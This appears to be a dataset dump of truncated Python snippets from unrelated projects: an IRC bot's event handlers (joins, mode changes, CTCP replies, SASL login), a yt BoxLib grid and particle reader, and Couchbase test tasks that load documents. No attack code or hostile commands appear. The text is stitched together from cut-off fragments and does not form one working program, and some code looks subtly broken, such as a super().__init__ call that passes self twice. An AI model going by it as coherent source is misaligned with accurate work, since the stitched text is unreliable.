input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
True
self.event_manager.run_callback("IRC/CTCPQueryReceived", event)
if action.upper() == "ACTION":
e = general_events.ActionReceived(
self, user_obj, channel_obj, data
)
e.cancelled = event.cancelled
self.event_manager.run_callback("ActionReceived", e)
if e.printable:
self.log.info(u"* %s:%s %s" % (user_obj, channel_obj, data))
else:
self.log.info(u"[{} {}] {}".format(
user.split("!", 1)[0], message[0], message[1] or ""
))
if not event.cancelled:
# Call super() to handle specific commands appropriately
irc.IRCClient.ctcpQuery(self, user, channel, messages)
# endregion
# region User events
#######################################################################
# Handlers for things such as users joining/parting channels. #
#######################################################################
def userJoined(self, user, channel):
""" Called when someone else joins a channel we're in. """
self.log.info(_("%s joined %s") % (user.nickname, channel))
# Note: User tracking is done in irc_JOIN rather than here
event = irc_events.UserJoinedEvent(self, channel, user)
self.event_manager.run_callback("IRC/UserJoined", event)
def userLeft(self, user, channel):
""" Called when someone else leaves a channel we're in. """
self.log.info(_("%s parted %s") % (user, channel))
chan_obj = self.get_channel(channel)
user_obj = self.get_user(nickname=user)
# User-tracking stuff
self.user_channel_part(user_obj, chan_obj)
event = irc_events.UserPartedEvent(self, chan_obj, user_obj)
self.event_manager.run_callback("IRC/UserParted", event)
def userKicked(self, kickee, channel, kicker, message):
""" Called when someone else is kicked from a channel we're in. """
self.log.info(_("%s was kicked from %s by %s: %s") % (
kickee, channel, kicker, message))
kickee_obj = self.get_user(nickname=kickee)
kicker_obj = self.get_user(nickname=kicker)
channel_obj = self.get_channel(channel)
# User-tracking stuff
self.user_channel_part(kickee_obj, channel_obj)
event = irc_events.UserKickedEvent(self,
channel_obj,
kickee_obj,
kicker_obj,
message)
self.event_manager.run_callback("IRC/UserKicked", event)
def irc_QUIT(self, user, params):
""" Called when someone else quits IRC. """
quitmessage = params[0]
self.log.info(_("%s has left IRC: %s") % (user, quitmessage))
# User-tracking stuff
user_obj = self.get_user(fullname=user)
temp_chans = set(user_obj.channels)
for channel in temp_chans:
self.user_channel_part(user_obj, channel)
event = irc_events.UserQuitEvent(self, user_obj, quitmessage)
self.event_manager.run_callback("IRC/UserQuit", event)
event = general_events.UserDisconnected(self, user_obj)
self.event_manager.run_callback("UserDisconnected", event)
# endregion
# region Channel events
#######################################################################
# Handlers for things such as channel mode changes and topic changes. #
#######################################################################
def modeChanged(self, user, channel, action, modes, args):
"""
Called when someone changes a mode. Action is a bool specifying
whether the mode was being set or unset.
If it's a usermode, channel is the user being changed.
Note: If it's a user-mode, channel_obj is set to None. Eventually, this
method should be placed elsewhere and call user/channelModeChanged()
instead.
"""
self.log.info(_("%s sets mode %s: %s%s %s") % (
user, channel, "+" if action else "-", modes,
" ".join([str(x) for x in args if x is not None])
))
# Get user/channel objects
try:
user_obj = self._get_user_from_user_string(user)
except Exception:
# Mode change from the server itself and things
self.log.trace(_("Mode change from irregular user: %s") % user)
user_obj = User(self, nickname=user, is_tracked=False)
# Note: Unlike in privmsg/notice/ctcpQuery, channel_obj = None when
# the target is ourself, rather than a user object. Perhaps this should
# be changed for clarity?
channel_obj = None
if not self.utils.compare_nicknames(self.get_nickname(), channel):
channel_obj = self.get_channel(channel)
# Handle the mode changes
for x in xrange(len(modes)):
if channel_obj is None:
# User mode (almost definitely always ourselves)
# TODO: Handle this (usermodes)
# Unsure how to handle this - is len(args) == len(modes)?
pass
elif modes[x] in self.ranks.modes:
# Rank channel mode
user_obj = self.get_user(args[x])
if user_obj:
rank = self.ranks.by_mode(modes[x])
if action:
user_obj.add_rank_in_channel(channel, rank)
else:
user_obj.remove_rank_in_channel(channel, rank)
else:
self.log.warning(
_("Rank mode %s set on invalid user %s in channel %s")
% (modes[x], args[x], channel))
else:
# Other channel mode
if action:
channel_obj.set_mode(modes[x], args[x])
else:
channel_obj.remove_mode(modes[x])
event = irc_events.ModeChangedEvent(self, user_obj, channel_obj,
action, modes, args)
self.event_manager.run_callback("IRC/ModeChanged", event)
def topicUpdated(self, user, channel, newTopic):
""" Called when the topic is updated in a channel -
also called when we join a channel. """
self.log.info(
_("Topic for %s: %s (set by %s)") % (channel, newTopic, user)
)
user_obj = self.get_user(nickname=user) or User(self, nickname=user,
is_tracked=False)
chan_obj = self.get_channel(channel) or Channel(self, channel)
event = irc_events.TopicUpdatedEvent(self, chan_obj, user_obj,
newTopic)
self.event_manager.run_callback("IRC/TopicUpdated", event)
# endregion
# region Lower-level event handling
#######################################################################
# Lower-level event handling. For example, irc_JOIN is called for #
# every JOIN message received, not just ones about other users. These #
# typically call the ones above, such as joined() and useJoined(). #
#######################################################################
def irc_JOIN(self, prefix, params):
""" Called on any join message
:param prefix: The user joining
:param params: The channel(s?) joined
"""
# irc.IRCClient.irc_JOIN(self, prefix, params)
# Removed as we can do this better than the library
# For some reason, userJoined only gives the user's nick, so we do
# user tracking here
# There will only ever be one channel, so just get that. No need to
# iterate.
channel = params[-1]
channel_obj = self.get_channel(channel)
if channel_obj is None:
channel_obj = Channel(self, channel)
self.set_channel(channel, channel_obj)
nickname, ident, host = self.utils.split_hostmask(prefix)
user_obj = self.user_join_channel(nickname,
ident,
host,
channel_obj)
if self.utils.compare_nicknames(nickname, self.get_nickname()):
# User-tracking stuff
if self.ourselves is None:
self.ourselves = user_obj
self.send_who(channel)
# Call the self-joined-channel method manually, since we're no
# longer calling the super method.
self.joined(channel)
else:
# Since we're using our own function and the library doesn't
# actually do anything with this, we can simply supply the
# user and channel objects.
self.userJoined(user_obj, channel_obj)
def irc_NICK(self, prefix, params):
""" Called when someone changes their nick.
Surprisingly, twisted doesn't have a handler for this. """
oldnick = prefix.split("!", 1)[0]
newnick = params[0]
user_obj = self.get_user(nickname=oldnick)
if not user_obj:
user_obj = User(self, newnick, is_tracked=False)
user_obj.nickname = newnick
self.log.info(_("%s is now known as %s") % (oldnick, newnick))
event = general_events.NameChanged(self, user_obj, oldnick)
self.event_manager.run_callback("NameChanged", event)
# endregion
# region CTCP specific command responses
#######################################################################
# Handlers for specific CTCP commands. These are dynamically found . #
# and called by ctcpQuery() - simply adding one makes it used. #
#######################################################################
def ctcpQuery_VERSION(self, user, channel, data_):
user_obj = self._get_user_from_user_string(user, False)
self.send_ctcp_reply(
user_obj, "VERSION", "Ultros v{}".format(__version__))
def ctcpQuery_SOURCE(self, user, channel, data_):
user_obj = self._get_user_from_user_string(user, False)
self.send_ctcp_reply(user_obj, "SOURCE", "http://ultros.io")
def ctcpQuery_FINGER(self, user, channel, data):
fingers = self.fingers
if not fingers:
return
user_obj = self._get_user_from_user_string(user, False)
self.send_ctcp_reply(user_obj, "FINGER", random.choice(fingers))
# endregion
# region SASL stuff
def sendSASL(self, name, password):
sasl = (
"%s\0%s\0%s" % (name, name, password)
).encode("base64").strip()
self.sendLine("AUTHENTICATE PLAIN")
self.sendLine("AUTHENTICATE %s" % sasl)
def irc_CAP(self, prefix, params):
self.log.debug("Capability message: %s / %s" % (prefix, params))
if (
len(params) < 2 or
params[1] != "ACK" or
params[2].split() != ["sasl"]
): # PEP8!
if self.identity["authentication"].lower() == "sasl":
self.log.error(
"SASL auth requested, but the server doesn't support "
"it!"
)
self.log.error(
"The bot will not login. Please correct this."
)
else:
if self.identity["authentication"].lower() == "sasl":
self.sendSASL(
self.identity["auth_name"], self.identity["auth_pass"]
)
def irc_900(self, prefix, params):
# "You are now logged in as x"
self.log.debug("IRC 900")
if len(params) > 3:
self.log.info(params[3])
def irc_903(self, prefix, params):
self.log.debug("IRC 903")
self.log.info(params[1])
self.sendLine("CAP END")
def irc_904(self, prefix, params):
self.log.debug("IRC 904")
self.log.warn(params[1])
def irc_905(self, prefix, params):
self.log.debug("IRC 905")
self.log.warn(params[1])
# endregion
# region Other RPL_* handlers
def irc_RPL_WHOREPLY(self, *nargs):
""" Called when we get a WHO reply from the server.
I'm seriously wondering if we even need this. """
data_ = nargs[1]
try:
channel = data_[1]
ident = data_[2] # Starts with a ~ if there's no identd present
host = data_[3]
server = data_[4]
nick = data_[5]
status = data_[6] # .strip("G").strip("H").strip("*")
gecos = data_[7] # Hops, realname
except Exception:
self.log.exception("Unable to parse WHO reply")
return
# User-tracking stuff
try:
chan_obj = self.get_channel(channel)
self.channel_who_response(nick,
ident,
host,
server,
status,
gecos,
chan_obj)
except KeyError:
# We got a WHO reply for a channel we're not in - doesn't matter
# for user-tracking purposes.
pass
else:
user_obj = self.get_user(nickname=nick)
data_ = {"ident": ident, "host": host, "server": server,
"status": status, "gecos": gecos}
event = irc_events.WHOReplyEvent(self, chan_obj, user_obj, data_)
self.event_manager.run_callback("IRC/WHOReply", event)
def irc_RPL_ENDOFWHO(self, *nargs):
""" Called when the server's done spamming us with WHO replies. """
data_ = nargs[1]
channel = data_[1]
try:
chan_obj = self.get_channel(channel)
except KeyError:
pass
else:
event = irc_events.WHOReplyEndEvent(self, chan_obj)
self.event_manager.run_callback("IRC/EndOfWHO", event)
def irc_RPL_ISUPPORT(self, prefix, params):
irc.IRCClient.irc_RPL_ISUPPORT(self, prefix, params)
for param in params[1:-1]:
self.log.trace(_("RPL_ISUPPORT received: %s") % param)
prm = param.split("=")[0].strip("-")
# prm is the param changed - don't bother parsing the value since
# it can be grabbed from self.supported with this:
# self.supported.getFeature(prm)
if prm == "CASEMAPPING":
| |
(float(v) for v in next(header_file).split())
if self.dimensionality > 1:
ylo, yhi = (float(v) for v in next(header_file).split())
else:
ylo, yhi = default_ybounds
if self.dimensionality > 2:
zlo, zhi = (float(v) for v in next(header_file).split())
else:
zlo, zhi = default_zbounds
self.grid_left_edge[grid_counter + gi, :] = [xlo, ylo, zlo]
self.grid_right_edge[grid_counter + gi, :] = [xhi, yhi, zhi]
# Now we get to the level header filename, which we open and parse.
fn = os.path.join(self.dataset.output_dir, next(header_file).strip())
level_header_file = open(fn + "_H")
level_dir = os.path.dirname(fn)
# We skip the first two lines, which contain BoxLib header file
# version and 'how' the data was written
next(level_header_file)
next(level_header_file)
# Now we get the number of components
ncomp_this_file = int(next(level_header_file)) # NOQA
# Skip the next line, which contains the number of ghost zones
next(level_header_file)
# To decipher this next line, we expect something like:
# (8 0
# where the first is the number of FABs in this level.
ngrids = int(next(level_header_file).split()[0][1:])
# Now we can iterate over each and get the indices.
for gi in range(ngrids):
# components within it
start, stop = _our_dim_finder.match(next(level_header_file)).groups()
# fix for non-3d data
# note we append '0' to both ends b/c of the '+1' in dims below
start += ",0" * (3 - self.dimensionality)
stop += ",0" * (3 - self.dimensionality)
start = np.array(start.split(","), dtype="int64")
stop = np.array(stop.split(","), dtype="int64")
dims = stop - start + 1
self.grid_dimensions[grid_counter + gi, :] = dims
self.grid_start_index[grid_counter + gi, :] = start
# Now we read two more lines. The first of these is a close
# parenthesis.
next(level_header_file)
# The next is again the number of grids
next(level_header_file)
# Now we iterate over grids to find their offsets in each file.
for gi in range(ngrids):
# Now we get the data file, at which point we're ready to
# create the grid.
dummy, filename, offset = next(level_header_file).split()
filename = os.path.join(level_dir, filename)
go = self.grid(grid_counter + gi, int(offset), filename, self)
go.Level = self.grid_levels[grid_counter + gi, :] = level
self.grids.append(go)
grid_counter += ngrids
# already read the filenames above...
self.float_type = "float64"
def _cache_endianness(self, test_grid):
"""
Cache the endianness and bytes perreal of the grids by using a
test grid and assuming that all grids have the same
endianness. This is a pretty safe assumption since Boxlib uses
one file per processor, and if you're running on a cluster
with different endian processors, then you're on your own!
"""
# open the test file & grab the header
with open(os.path.expanduser(test_grid.filename), "rb") as f:
header = f.readline().decode("ascii", "ignore")
bpr, endian, start, stop, centering, nc = (
_header_pattern[self.dimensionality - 1].search(header).groups()
)
# Note that previously we were using a different value for BPR than we
# use now. Here is an example set of information directly from BoxLib
"""
* DOUBLE data
* FAB ((8, (64 11 52 0 1 12 0 1023)),(8, (1 2 3 4 5 6 7 8)))((0,0) (63,63) (0,0)) 27 # NOQA: E501
* FLOAT data
* FAB ((8, (32 8 23 0 1 9 0 127)),(4, (1 2 3 4)))((0,0) (63,63) (0,0)) 27
"""
if bpr == endian[0]:
dtype = f"<f{bpr}"
elif bpr == endian[-1]:
dtype = f">f{bpr}"
else:
raise ValueError(
"FAB header is neither big nor little endian. "
"Perhaps the file is corrupt?"
)
mylog.debug("FAB header suggests dtype of %s", dtype)
self._dtype = np.dtype(dtype)
def _populate_grid_objects(self):
mylog.debug("Creating grid objects")
self.grids = np.array(self.grids, dtype="object")
self._reconstruct_parent_child()
for i, grid in enumerate(self.grids):
if (i % 1e4) == 0:
mylog.debug("Prepared % 7i / % 7i grids", i, self.num_grids)
grid._prepare_grid()
grid._setup_dx()
mylog.debug("Done creating grid objects")
def _reconstruct_parent_child(self):
if self.max_level == 0:
return
mask = np.empty(len(self.grids), dtype="int32")
mylog.debug("First pass; identifying child grids")
for i, grid in enumerate(self.grids):
get_box_grids_level(
self.grid_left_edge[i, :],
self.grid_right_edge[i, :],
self.grid_levels[i] + 1,
self.grid_left_edge,
self.grid_right_edge,
self.grid_levels,
mask,
)
ids = np.where(mask.astype("bool")) # where is a tuple
grid._children_ids = ids[0] + grid._id_offset
mylog.debug("Second pass; identifying parents")
for i, grid in enumerate(self.grids): # Second pass
for child in grid.Children:
child._parent_id.append(i + grid._id_offset)
def _count_grids(self):
# We can get everything from the Header file, but note that we're
# duplicating some work done elsewhere. In a future where we don't
# pre-allocate grid arrays, this becomes unnecessary.
header_file = open(self.header_filename)
header_file.seek(self.dataset._header_mesh_start)
# Skip over the level dxs, geometry and the zero:
[next(header_file) for i in range(self.dataset._max_level + 3)]
# Now we need to be very careful, as we've seeked, and now we iterate.
# Does this work? We are going to count the number of places that we
# have a three-item line. The three items would be level, number of
# grids, and then grid time.
self.num_grids = 0
for line in header_file:
if len(line.split()) != 3:
continue
self.num_grids += int(line.split()[1])
def _initialize_grid_arrays(self):
super()._initialize_grid_arrays()
self.grid_start_index = np.zeros((self.num_grids, 3), "int64")
def _initialize_state_variables(self):
"""override to not re-initialize num_grids in AMRHierarchy.__init__"""
self._parallel_locking = False
self._data_file = None
self._data_mode = None
def _detect_output_fields(self):
# This is all done in _parse_header_file
self.field_list = [("boxlib", f) for f in self.dataset._field_list]
self.field_indexes = {f[1]: i for i, f in enumerate(self.field_list)}
# There are times when field_list may change. We copy it here to
# avoid that possibility.
self.field_order = [f for f in self.field_list]
def _setup_data_io(self):
self.io = io_registry[self.dataset_type](self.dataset)
def _determine_particle_output_type(self, directory_name):
header_filename = self.ds.output_dir + "/" + directory_name + "/Header"
with open(header_filename) as f:
version_string = f.readline().strip()
if version_string.startswith("Version_Two"):
return AMReXParticleHeader
else:
return BoxLibParticleHeader
def _read_particles(self, directory_name, is_checkpoint, extra_field_names=None):
pheader = self._determine_particle_output_type(directory_name)
self.particle_headers[directory_name] = pheader(
self.ds, directory_name, is_checkpoint, extra_field_names
)
num_parts = self.particle_headers[directory_name].num_particles
if self.ds._particle_type_counts is None:
self.ds._particle_type_counts = {}
self.ds._particle_type_counts[directory_name] = num_parts
base = os.path.join(self.ds.output_dir, directory_name)
if len(glob.glob(os.path.join(base, "Level_?", "DATA_????"))) > 0:
base_particle_fn = os.path.join(base, "Level_%d", "DATA_%.4d")
elif len(glob.glob(os.path.join(base, "Level_?", "DATA_?????"))) > 0:
base_particle_fn = os.path.join(base, "Level_%d", "DATA_%.5d")
else:
return
gid = 0
for lev, data in self.particle_headers[directory_name].data_map.items():
for pdf in data.values():
pdict = self.grids[gid]._pdata
pdict[directory_name] = {}
pdict[directory_name]["particle_filename"] = base_particle_fn % (
lev,
pdf.file_number,
)
pdict[directory_name]["offset"] = pdf.offset
pdict[directory_name]["NumberOfParticles"] = pdf.num_particles
self.grid_particle_count[gid] += pdf.num_particles
self.grids[gid].NumberOfParticles += pdf.num_particles
gid += 1
# add particle fields to field_list
pfield_list = self.particle_headers[directory_name].known_fields
self.field_list.extend(pfield_list)
class BoxlibDataset(Dataset):
"""
This class is a stripped down class that simply reads and parses
*filename*, without looking at the Boxlib index.
"""
_index_class = BoxlibHierarchy
_field_info_class = BoxlibFieldInfo
_output_prefix = None
_default_cparam_filename = "job_info"
_periodicity = (False, False, False)
def __init__(
self,
output_dir,
cparam_filename=None,
fparam_filename=None,
dataset_type="boxlib_native",
storage_filename=None,
units_override=None,
unit_system="cgs",
default_species_fields=None,
):
"""
The paramfile is usually called "inputs"
and there may be a fortran inputs file usually called "probin"
plotname here will be a directory name
as per BoxLib, dataset_type will be Native (implemented here), IEEE (not
yet implemented) or ASCII (not yet implemented.)
"""
self.fluid_types += ("boxlib",)
self.output_dir = os.path.abspath(os.path.expanduser(output_dir))
cparam_filename = cparam_filename or self.__class__._default_cparam_filename
self.cparam_filename = self._lookup_cparam_filepath(
output_dir, cparam_filename=cparam_filename
)
self.fparam_filename = self._localize_check(fparam_filename)
self.storage_filename = storage_filename
Dataset.__init__(
self,
output_dir,
dataset_type,
units_override=units_override,
unit_system=unit_system,
default_species_fields=default_species_fields,
)
# These are still used in a few places.
if "HydroMethod" not in self.parameters.keys():
self.parameters["HydroMethod"] = "boxlib"
self.parameters["Time"] = 1.0 # default unit is 1...
self.parameters["EOSType"] = -1 # default
self.parameters["gamma"] = self.parameters.get("materials.gamma", 1.6667)
def _localize_check(self, fn):
if fn is None:
return None
# If the file exists, use it. If not, set it to None.
root_dir = os.path.dirname(self.output_dir)
full_fn = os.path.join(root_dir, fn)
if os.path.exists(full_fn):
return full_fn
return None
@classmethod
def _is_valid(cls, filename, *args, cparam_filename=None, **kwargs):
output_dir = filename
header_filename = os.path.join(output_dir, "Header")
# boxlib datasets are always directories, and
# We *know* it's not boxlib if Header doesn't exist.
if not os.path.exists(header_filename):
return False
if cls is BoxlibDataset:
# Stop checks here for the boxlib base class.
# Further checks are performed on subclasses.
return True
cparam_filename = cparam_filename or cls._default_cparam_filename
cparam_filepath = cls._lookup_cparam_filepath(output_dir, cparam_filename)
if cparam_filepath is None:
return False
lines = [line.lower() for line in open(cparam_filepath).readlines()]
return any(cls._subtype_keyword in line for line in lines)
@classmethod
def _lookup_cparam_filepath(cls, output_dir, cparam_filename):
lookup_table = [
os.path.abspath(os.path.join(p, cparam_filename))
for p in (output_dir, | |
if self.op_types:
if len(self.op_types) != len(self.generators):
self.set_exception(
Exception("Not all generators have op_type!"))
self.complete_task()
if self.buckets:
if len(self.op_types) != len(self.buckets):
self.set_exception(
Exception("Not all generators have bucket specified!"))
self.complete_task()
iterator = 0
tasks = []
for generator in self.generators:
if self.op_types:
self.op_type = self.op_types[iterator]
if self.buckets:
self.bucket = self.buckets[iterator]
tasks.extend(self.get_tasks(generator))
iterator += 1
if self.print_ops_rate:
self.print_ops_rate_tasks = list()
if self.buckets:
for bucket in self.buckets:
print_ops_rate_task = PrintOpsRate(self.cluster, bucket)
self.print_ops_rate_tasks.append(print_ops_rate_task)
self.task_manager.add_new_task(print_ops_rate_task)
else:
print_ops_rate_task = PrintOpsRate(self.cluster, self.bucket)
self.print_ops_rate_tasks.append(print_ops_rate_task)
self.task_manager.add_new_task(print_ops_rate_task)
try:
for task in tasks:
self.task_manager.add_new_task(task)
for task in tasks:
try:
self.task_manager.get_task_result(task)
self.log.info("Items loaded in task {} are {}"
.format(task.thread_name, task.docs_loaded))
i = 0
while task.docs_loaded < task.generator._doc_gen.end - task.generator._doc_gen.start and i < 60:
self.log.error("Bug in java Futures task. Items loaded in task {} is {}".format(task.thread_name, task.docs_loaded))
sleep(1)
i += 1
except Exception as e:
self.test_log.error(e)
finally:
self.fail.update(task.fail)
self.success.update(task.success)
if task.fail.__len__() != 0:
target_log = self.test_log.error
else:
target_log = self.test_log.debug
target_log("Failed to load {} docs from {} to {}"
.format(task.fail.__len__(),
task.generator._doc_gen.start,
task.generator._doc_gen.end))
except Exception as e:
self.test_log.error(e)
self.set_exception(e)
finally:
if self.print_ops_rate and hasattr(self, "print_ops_rate_tasks"):
for print_ops_rate_task in self.print_ops_rate_tasks:
print_ops_rate_task.end_task()
self.task_manager.get_task_result(print_ops_rate_task)
self.log.debug("========= Tasks in loadgen pool=======")
self.task_manager.print_tasks_in_pool()
self.log.debug("======================================")
for task in tasks:
self.task_manager.stop_task(task)
self.log.info("Task '{0}' complete. Loaded {1} items"
.format(task.thread_name, task.docs_loaded))
for client in self.clients:
client.close()
self.complete_task()
return self.fail
def get_tasks(self, generator):
generators = []
tasks = []
gen_start = int(generator.start)
gen_end = max(int(generator.end), 1)
gen_range = max(int((generator.end - generator.start) / self.process_concurrency), 1)
for pos in range(gen_start, gen_end, gen_range):
partition_gen = copy.deepcopy(generator)
partition_gen.start = pos
partition_gen.itr = pos
partition_gen.end = pos + gen_range
if partition_gen.end > generator.end:
partition_gen.end = generator.end
batch_gen = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
generators.append(batch_gen)
for i in range(0, len(generators)):
task = LoadDocumentsTask(
self.cluster, self.bucket, self.clients[i], generators[i],
self.op_type, self.exp, self.exp_unit, self.flag,
persist_to=self.persit_to, replicate_to=self.replicate_to,
time_unit=self.time_unit, batch_size=self.batch_size,
pause_secs=self.pause_secs, timeout_secs=self.timeout_secs,
compression=self.compression,
durability=self.durability,
task_identifier=self.task_identifier,
skip_read_on_error=self.skip_read_on_error)
tasks.append(task)
return tasks
class LoadSubDocumentsGeneratorsTask(Task):
def __init__(self, cluster, task_manager, bucket, clients,
generators,
op_type, exp, create_paths=False,
xattr=False, exp_unit="seconds", flag=0,
persist_to=0, replicate_to=0, time_unit="seconds",
only_store_hash=True, batch_size=1, pause_secs=1,
timeout_secs=5, compression=True,
process_concurrency=8,
print_ops_rate=True, retries=5, durability="",
task_identifier=""):
thread_name = "SubDocumentsLoadGenTask_{}_{}_{}_{}_{}" \
.format(task_identifier,
bucket.name,
op_type,
durability,
time.time())
super(LoadSubDocumentsGeneratorsTask, self).__init__(thread_name)
self.cluster = cluster
self.exp = exp
self.create_path = create_paths
self.xattr = xattr
self.exp_unit = exp_unit
self.flag = flag
self.persit_to = persist_to
self.replicate_to = replicate_to
self.time_unit = time_unit
self.only_store_hash = only_store_hash
self.pause_secs = pause_secs
self.timeout_secs = timeout_secs
self.compression = compression
self.process_concurrency = process_concurrency
self.clients = clients
self.task_manager = task_manager
self.batch_size = batch_size
self.generators = generators
self.input_generators = generators
self.op_types = None
self.buckets = None
self.print_ops_rate = print_ops_rate
self.retries = retries
self.durability = durability
if isinstance(op_type, list):
self.op_types = op_type
else:
self.op_type = op_type
if isinstance(bucket, list):
self.buckets = bucket
else:
self.bucket = bucket
self.num_loaded = 0
self.fail = {}
self.success = {}
def call(self):
self.start_task()
if self.op_types:
if len(self.op_types) != len(self.generators):
self.set_exception(
Exception("Not all generators have op_type!"))
self.complete_task()
if self.buckets:
if len(self.op_types) != len(self.buckets):
self.set_exception(
Exception(
"Not all generators have bucket specified!"))
self.complete_task()
iterator = 0
tasks = []
for generator in self.generators:
if self.op_types:
self.op_type = self.op_types[iterator]
if self.buckets:
self.bucket = self.buckets[iterator]
tasks.extend(self.get_tasks(generator))
iterator += 1
if self.print_ops_rate:
self.print_ops_rate_tasks = []
if self.buckets:
for bucket in self.buckets:
print_ops_rate_task = PrintOpsRate(self.cluster,
bucket)
self.print_ops_rate_tasks.append(
print_ops_rate_task)
self.task_manager.add_new_task(print_ops_rate_task)
else:
print_ops_rate_task = PrintOpsRate(self.cluster,
self.bucket)
self.print_ops_rate_tasks.append(print_ops_rate_task)
self.task_manager.add_new_task(print_ops_rate_task)
try:
for task in tasks:
self.task_manager.add_new_task(task)
for task in tasks:
try:
self.task_manager.get_task_result(task)
except Exception as e:
self.log.error(e)
finally:
self.fail.update(task.fail)
self.success.update(task.success)
self.log.debug("Failed to load {} sub_docs from {} "
"to {}"
.format(task.fail.__len__(),
task.generator._doc_gen.start,
task.generator._doc_gen.end))
except Exception as e:
self.log.error(e)
self.set_exception(e)
finally:
if self.print_ops_rate and hasattr(self,
"print_ops_rate_tasks"):
for print_ops_rate_task in self.print_ops_rate_tasks:
print_ops_rate_task.end_task()
self.task_manager.get_task_result(
print_ops_rate_task)
self.log.debug("===========Tasks in loadgen pool=======")
self.task_manager.print_tasks_in_pool()
self.log.debug("=======================================")
for task in tasks:
self.task_manager.stop_task(task)
for client in self.clients:
client.close()
self.complete_task()
return self.fail
def get_tasks(self, generator):
generators = []
tasks = []
gen_start = int(generator.start)
gen_end = max(int(generator.end), 1)
gen_range = max(int((generator.end - generator.start) /
self.process_concurrency),
1)
for pos in range(gen_start, gen_end, gen_range):
if not isinstance(generator, SubdocDocumentGenerator):
self.set_exception("Document generator needs to be of"
" type SubdocDocumentGenerator")
partition_gen = copy.deepcopy(generator)
partition_gen.start = pos
partition_gen.itr = pos
partition_gen.end = pos + gen_range
if partition_gen.end > generator.end:
partition_gen.end = generator.end
batch_gen = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
generators.append(batch_gen)
for i in range(0, len(generators)):
task = LoadSubDocumentsTask(self.cluster, self.bucket,
self.clients[i], generators[i],
self.op_type, self.exp,
create_paths=self.create_path,
xattr=self.xattr,
exp_unit=self.exp_unit,
flag=self.flag,
persist_to=self.persit_to,
replicate_to=self.replicate_to,
time_unit=self.time_unit,
batch_size=self.batch_size,
pause_secs=self.pause_secs,
timeout_secs=self.timeout_secs,
compression=self.compression,
retries=self.retries,
durability=self.durability)
tasks.append(task)
return tasks
class ContinuousDocUpdateTask(Task):
def __init__(self, cluster, task_manager, bucket, clients, generator,
exp, flag=0, persist_to=0, replicate_to=0,
durability="", time_unit="seconds",
only_store_hash=True, batch_size=1,
pause_secs=1, timeout_secs=5, compression=True,
process_concurrency=4, print_ops_rate=True):
super(ContinuousDocUpdateTask, self).__init__(
"ContinuousDocUpdateTask_{}_{}".format(bucket.name, time.time()))
self.cluster = cluster
self.exp = exp
self.flag = flag
self.persist_to = persist_to
self.replicate_to = replicate_to
self.durability = durability
self.time_unit = time_unit
self.only_store_hash = only_store_hash
self.pause_secs = pause_secs
self.timeout_secs = timeout_secs
self.compression = compression
self.process_concurrency = process_concurrency
self.clients = clients
self.task_manager = task_manager
self.batch_size = batch_size
self.generator = generator
self.buckets = None
self.success = dict()
self.fail = dict()
self.key = self.generator.name
self.doc_start_num = self.generator.start
self.doc_end_num = self.generator.end
self.doc_type = self.generator.doc_type
self.op_type = "update"
self.__stop_updates = False
if isinstance(bucket, list):
self.buckets = bucket
else:
self.bucket = bucket
def end_task(self):
self.__stop_updates = True
def _start_doc_updates(self, bucket):
self.test_log.info("Updating docs in %s" % bucket.name)
while not self.__stop_updates:
doc_gens = list()
doc_tasks = list()
for _ in self.clients:
doc_gens.append(copy.deepcopy(self.generator))
for index, generator in enumerate(doc_gens):
batch_gen = BatchedDocumentGenerator(generator,
self.batch_size)
task = LoadDocumentsTask(
self.cluster, bucket, self.clients[index],
batch_gen, "update", self.exp,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability,
batch_size=self.batch_size,
timeout_secs=self.timeout_secs)
self.task_manager.add_new_task(task)
doc_tasks.append(task)
self.fail.update(task.fail)
for task in doc_tasks:
self.task_manager.get_task_result(task)
self.test_log.info("Closing SDK clients..")
for client in self.clients:
client.close()
self.test_log.info("Done updating docs in %s" % bucket.name)
def call(self):
self.start_task()
if self.buckets:
for bucket in self.buckets:
self._start_doc_updates(bucket)
else:
self._start_doc_updates(self.bucket)
self.complete_task()
class LoadDocumentsForDgmTask(LoadDocumentsGeneratorsTask):
def __init__(self, cluster, task_manager, bucket, clients, key, exp,
doc_index=0, batch_size=50,
persist_to=0, replicate_to=0,
durability="",
timeout_secs=5,
process_concurrency=4, print_ops_rate=True,
active_resident_threshold=99,
task_identifier=""):
# super(LoadDocumentsForDgmTask, self).__init__(
# "LoadDocumentsForDgmTask_{}_{}".format(bucket.name, time.time()))
super(LoadDocumentsForDgmTask, self).__init__(
self, cluster, task_manager, bucket, clients, None,
"create", exp, task_identifier="DGM_%s"%bucket.name)
self.cluster = cluster
self.exp = exp
self.persist_to = persist_to
self.replicate_to = replicate_to
self.durability = durability
self.timeout_secs = timeout_secs
self.process_concurrency = process_concurrency
self.clients = clients
self.task_manager = task_manager
self.batch_size = batch_size
self.op_types = None
self.buckets = None
self.print_ops_rate = print_ops_rate
self.active_resident_threshold = active_resident_threshold
self.key = key
self.task_identifier = task_identifier
self.op_type = "create"
self.rest_client = BucketHelper(self.cluster.master)
self.doc_index = doc_index
if isinstance(bucket, list):
self.buckets = bucket
else:
self.buckets = [bucket]
def _get_bucket_dgm(self, bucket):
bucket_stat = self.rest_client.get_bucket_stats_for_node(
bucket.name,
self.cluster.master)
return bucket_stat["vb_active_resident_items_ratio"]
def _load_next_batch_of_docs(self, bucket):
doc_gens = list()
doc_tasks = list()
self.test_log.debug("Doc load from index %d" % self.doc_index)
for _ in self.clients:
doc_gens.append(doc_generator(
self.key, self.doc_index, self.doc_index+10000))
self.doc_index += 10000
# Start doc_loading tasks
for index, generator in enumerate(doc_gens):
batch_gen = BatchedDocumentGenerator(generator, self.batch_size)
task = LoadDocumentsTask(
self.cluster, bucket, self.clients[index], batch_gen,
"create", self.exp,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
durability=self.durability,
timeout_secs=self.timeout_secs,
skip_read_on_error=True)
self.task_manager.add_new_task(task)
doc_tasks.append(task)
# Wait for doc_loading tasks to complete
for task in doc_tasks:
self.task_manager.get_task_result(task)
def _load_bucket_into_dgm(self, bucket):
dgm_value = self._get_bucket_dgm(bucket)
self.test_log.info("DGM doc loading for '%s' to atleast %s%%"
% (bucket.name, self.active_resident_threshold))
while dgm_value > self.active_resident_threshold:
self.test_log.debug("Active_resident_items_ratio for {0} is {1}"
.format(bucket.name, dgm_value))
self._load_next_batch_of_docs(bucket)
dgm_value = self._get_bucket_dgm(bucket)
